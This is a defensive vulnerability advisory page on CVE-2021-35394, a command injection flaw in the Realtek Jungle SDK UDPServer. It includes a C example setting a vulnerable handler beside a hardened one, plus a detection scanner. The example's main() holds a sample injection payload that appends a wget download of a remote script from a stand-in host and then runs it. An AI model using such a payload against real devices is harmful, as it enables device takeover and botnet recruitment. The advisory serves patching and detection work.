Mallory
Critical · CISA KEV · Exploited in the wild · Public exploit

Realtek Jungle SDK UDPServer Remote Command Injection RCE

Identifiers: CVE-2021-35394 · CWE-78 (Improper Neutralization of Special…)

CVE-2021-35394 affects the Realtek Jungle SDK diagnostic component known as MP Daemon, which is usually compiled as the UDPServer binary, in versions 2.x through 3.4.14B. UDPServer is a network-reachable service (it listens on UDP port 9034) and is affected by multiple memory corruption issues as well as an arbitrary command injection vulnerability. The command injection can be exploited remotely and without authentication: an attacker sends a crafted datagram to UDPServer and the device executes attacker-controlled commands. Because the Jungle SDK is embedded across a large downstream IoT supply chain, the issue affects numerous products derived from the SDK, including routers and other embedded devices from many vendors.
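The command-injection class behind this CVE, shown as an added example that is not Realtek's code and does not reproduce UDPServer's actual message format: a hypothetical UDP diagnostic handler in the vulnerable shape (datagram bytes become a command line for system()) next to a hardened shape that dispatches only allowlisted programs with validated positional arguments through execv, so no shell ever parses attacker-supplied bytes. The program names, binary paths and sample payloads are assumptions.

```c
/* Added example (not Realtek code): CWE-78 in a UDP diagnostic handler,
 * vulnerable shape next to a hardened shape.  Names and paths are assumed. */
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define MAX_ARGS    4
#define MAX_ARG_LEN 32

/* --- Vulnerable shape -------------------------------------------------- */
/* The datagram becomes the command line that would be handed to system().
 * Everything after ';', '|', '&' or inside backticks runs as a separate
 * command.  The string is returned instead of executed so the example is
 * safe to run; the copy is bounded here so only the injection is in play
 * (the real daemon also has memory corruption bugs, see above). */
size_t vuln_build_command(const char *payload, size_t len, char *cmd, size_t cmdlen)
{
    if (len >= cmdlen) len = cmdlen - 1;
    memcpy(cmd, payload, len);
    cmd[len] = '\0';
    /* system(cmd);   <-- the injection point in the vulnerable handler */
    return len;
}

/* --- Hardened shape ---------------------------------------------------- */
/* Only these programs can be run, by index; the paths are assumptions. */
static const struct { const char *name; const char *path; } ALLOWED[] = {
    { "ifconfig", "/sbin/ifconfig" },
    { "ping",     "/bin/ping"      },
    { "iwconfig", "/sbin/iwconfig" },
};
#define N_ALLOWED (sizeof ALLOWED / sizeof ALLOWED[0])

typedef struct {
    int  idx;                               /* allowlist index, -1 = rejected */
    int  argc;
    char argv[MAX_ARGS + 1][MAX_ARG_LEN + 1];
} diag_req;

/* Positional arguments only: letters, digits, '.', '-', '_'; no leading '-'
 * (so a request cannot smuggle in program options), no shell metacharacters. */
static int arg_is_safe(const char *s)
{
    if (*s == '\0' || *s == '-' || strlen(s) > MAX_ARG_LEN) return 0;
    for (; *s; s++)
        if (!isalnum((unsigned char)*s) && *s != '.' && *s != '-' && *s != '_')
            return 0;
    return 1;
}

/* Parse "<program> <arg> ..." from the datagram into a fixed argv.
 * Any deviation rejects the whole request (idx stays -1). */
diag_req hard_parse_request(const char *payload, size_t len)
{
    diag_req r = { .idx = -1, .argc = 0 };
    char buf[256];
    char *save = NULL, *tok;
    int idx = -1;

    /* Reject oversized datagrams and embedded NULs (truncation tricks). */
    if (len == 0 || len >= sizeof buf || memchr(payload, '\0', len)) return r;
    memcpy(buf, payload, len);
    buf[len] = '\0';

    tok = strtok_r(buf, " ", &save);
    if (!tok) return r;
    for (size_t i = 0; i < N_ALLOWED; i++)
        if (strcmp(tok, ALLOWED[i].name) == 0) { idx = (int)i; break; }
    if (idx < 0) return r;                          /* "ifconfig;wget" fails here */
    strcpy(r.argv[r.argc++], tok);

    while ((tok = strtok_r(NULL, " ", &save)) != NULL) {
        if (r.argc > MAX_ARGS || !arg_is_safe(tok)) return r;   /* "eth0;sh" fails here */
        strcpy(r.argv[r.argc++], tok);
    }
    r.idx = idx;
    return r;
}

/* Run a validated request without a shell: fork + execv with the fixed argv.
 * Returns the child's exit status, or -1 when the request was rejected. */
int hard_exec(const diag_req *r)
{
    if (r->idx < 0) return -1;
    char *av[MAX_ARGS + 2];
    int i, status = 0;
    for (i = 0; i < r->argc; i++) av[i] = (char *)r->argv[i];
    av[i] = NULL;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) { execv(ALLOWED[r->idx].path, av); _exit(127); }
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed payloads: what a legitimate client and an attacker might send. */
    const char *benign = "ifconfig eth0";
    const char *attack = "ifconfig eth0; wget http://203.0.113.5/a.sh -O /tmp/a; sh /tmp/a";
    char cmd[128];

    vuln_build_command(attack, strlen(attack), cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);

    diag_req a = hard_parse_request(attack, strlen(attack));
    diag_req b = hard_parse_request(benign, strlen(benign));
    printf("hardened handler: attack idx=%d, benign idx=%d argc=%d\n", a.idx, b.idx, b.argc);
    return 0;
}
```

The design point is that the hardened path never builds a string for a shell: the program is chosen by allowlist index, arguments are checked against a small character set before they are copied, and execv receives a fixed argv, so the separators and substitutions that make the attack payload work simply have nowhere to act.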

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows remote unauthenticated attackers to execute arbitrary system commands on affected devices and effectively take over the target. Observed post-exploitation activity includes downloading and executing malware, writing and launching binaries directly on the device, enrolling devices into botnets such as Mirai, Gafgyt, Mozi, and RedGoBot, and issuing reboot commands to cause denial of service. In practice this means full compromise of the device, botnet recruitment, DDoS capability, service disruption, and use of the device as infrastructure for further attacks.

Mitigation

If you can’t patch tonight, do this now.

Until patches can be applied, block access to UDPServer on UDP port 9034 from untrusted networks and the public internet, and use segmentation and ACL/firewall rules so that only trusted management hosts can reach it. Monitor for inbound traffic and exploit attempts against UDPServer, and for the signs of a successful compromise: unexpected outbound callbacks, malware downloads, new binaries on the device, and unexplained reboots. If a device is believed to be compromised, isolate it from the network, factory reset it, reinstall trusted firmware, and return it to service only after validation.
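One way to implement the monitoring step above, as an added example that is not part of the original page or of any vendor tool: flow records in a constructed key=value format are checked for inbound UDP datagrams to port 9034 whose source lies outside a trusted management range, which is exactly the reachability the mitigation says should not exist. The record format, the management CIDR and the sample records are assumptions.

```c
/* Added example (not from the page or any vendor tool): flag flow records
 * showing UDPServer (UDP/9034) reached from outside a management range. */
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <strings.h>
#include <arpa/inet.h>

/* Parse "a.b.c.d/n" into network and mask in host byte order. 0 = bad input. */
static int parse_cidr(const char *cidr, uint32_t *net, uint32_t *mask)
{
    char ip[INET_ADDRSTRLEN];
    struct in_addr a;
    int bits;
    const char *slash = strchr(cidr, '/');
    if (!slash || (size_t)(slash - cidr) >= sizeof ip) return 0;
    memcpy(ip, cidr, (size_t)(slash - cidr));
    ip[slash - cidr] = '\0';
    if (sscanf(slash + 1, "%d", &bits) != 1 || bits < 0 || bits > 32) return 0;
    if (inet_pton(AF_INET, ip, &a) != 1) return 0;
    *mask = bits == 0 ? 0 : 0xFFFFFFFFu << (32 - bits);
    *net  = ntohl(a.s_addr) & *mask;
    return 1;
}

int ip_in_cidr(const char *ip, const char *cidr)
{
    uint32_t net, mask;
    struct in_addr a;
    if (!parse_cidr(cidr, &net, &mask) || inet_pton(AF_INET, ip, &a) != 1) return 0;
    return (ntohl(a.s_addr) & mask) == net;
}

/* A flow record in an assumed "key=value ..." form; only the fields used
 * for this check are kept. */
typedef struct {
    char src[INET_ADDRSTRLEN];
    char dst[INET_ADDRSTRLEN];
    char proto[8];
    int  dport;
} flow;

static int parse_flow(const char *line, flow *f)
{
    char buf[256], *save = NULL, *tok;
    memset(f, 0, sizeof *f);
    f->dport = -1;
    if (strlen(line) >= sizeof buf) return 0;
    strcpy(buf, line);
    for (tok = strtok_r(buf, " ", &save); tok; tok = strtok_r(NULL, " ", &save)) {
        if (sscanf(tok, "src=%15s", f->src) == 1) continue;
        if (sscanf(tok, "dst=%15s", f->dst) == 1) continue;
        if (sscanf(tok, "proto=%7s", f->proto) == 1) continue;
        sscanf(tok, "dport=%d", &f->dport);           /* other keys are ignored */
    }
    return f->src[0] != '\0' && f->proto[0] != '\0' && f->dport >= 0;
}

/* 1 = alert: UDP datagram to port 9034 from a source outside mgmt_cidr. */
int udpserver_exposure_alert(const char *line, const char *mgmt_cidr)
{
    flow f;
    if (!parse_flow(line, &f)) return 0;
    if (strcasecmp(f.proto, "udp") != 0 || f.dport != 9034) return 0;
    return ip_in_cidr(f.src, mgmt_cidr) ? 0 : 1;
}

/* Count alerts over a batch of records. */
int scan_flows(const char *const lines[], size_t n, const char *mgmt_cidr)
{
    int alerts = 0;
    for (size_t i = 0; i < n; i++)
        alerts += udpserver_exposure_alert(lines[i], mgmt_cidr);
    return alerts;
}

/* Constructed sample records (not real traffic). */
static const char *const SAMPLE_FLOWS[] = {
    "ts=2023-01-10T08:00:01Z src=10.0.50.5 dst=10.0.0.12 proto=udp dport=9034 bytes=64",
    "ts=2023-01-10T08:00:02Z src=198.51.100.7 dst=10.0.0.12 proto=udp dport=9034 bytes=64",
    "ts=2023-01-10T08:00:03Z src=198.51.100.7 dst=10.0.0.12 proto=tcp dport=80 bytes=640",
    "ts=2023-01-10T08:00:04Z src=203.0.113.9 dst=10.0.0.13 proto=UDP dport=9034 bytes=48",
};
#define N_SAMPLE (sizeof SAMPLE_FLOWS / sizeof SAMPLE_FLOWS[0])

int main(void)
{
    const char *mgmt = "10.0.50.0/24";    /* assumed trusted management range */
    for (size_t i = 0; i < N_SAMPLE; i++)
        if (udpserver_exposure_alert(SAMPLE_FLOWS[i], mgmt))
            printf("ALERT UDPServer reachable from untrusted source: %s\n", SAMPLE_FLOWS[i]);
    printf("%d of %zu records flagged\n", scan_flows(SAMPLE_FLOWS, N_SAMPLE, mgmt), N_SAMPLE);
    return 0;
}
```

Any hit from outside the management range is worth an alert on its own, because a device that answers on UDP/9034 to an untrusted source is exposed whether or not that particular datagram carried an exploit; the same check run against the firewall's own logs confirms the block rule is actually in effect.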

Remediation

Patch, then assume compromise.

Apply vendor firmware updates that address CVE-2021-35394 in Realtek Jungle SDK-derived products. Because the vulnerable component is embedded in downstream OEM/ODM devices, remediation generally means obtaining and installing patched firmware from the device manufacturer rather than from Realtek directly. Affected SDK versions run from 2.x up to 3.4.14B, so devices built on those releases should be moved to a fixed release supplied by the vendor; where the vendor has not published one, keep the network restrictions described under Mitigation in place or replace the device. If compromise is suspected, factory reset the device and reinstall firmware, then rotate any relevant credentials and verify that no unauthorized services or persistence mechanisms remain.
PUBLIC EXPLOITS

Exploits

No public exploit code observed for this vulnerability (valid 0 / 0 total tracked).

EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

Vendor    Product                                   Type
Realtek   Jungle SDK                                application
Realtek   RTL819x Jungle Software Development Kit   application

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

What this page doesn't show

This page is what's public. Mallory adds the parts that aren't: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.

- Exposure mapping: query your assets running an affected version, and investigate the blast radius.
- Threat actor evidence: every observed campaign linking this CVE to a named adversary.
- Associated malware (6): malware families riding this exploit, with evidence and IOCs.
- Detection signatures (1): YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
- Vendor-by-vendor mapping: cross-references every affected SKU, including bundled OEM variants.
- Social activity (1): community discussion across Reddit, Mastodon, and other social sources.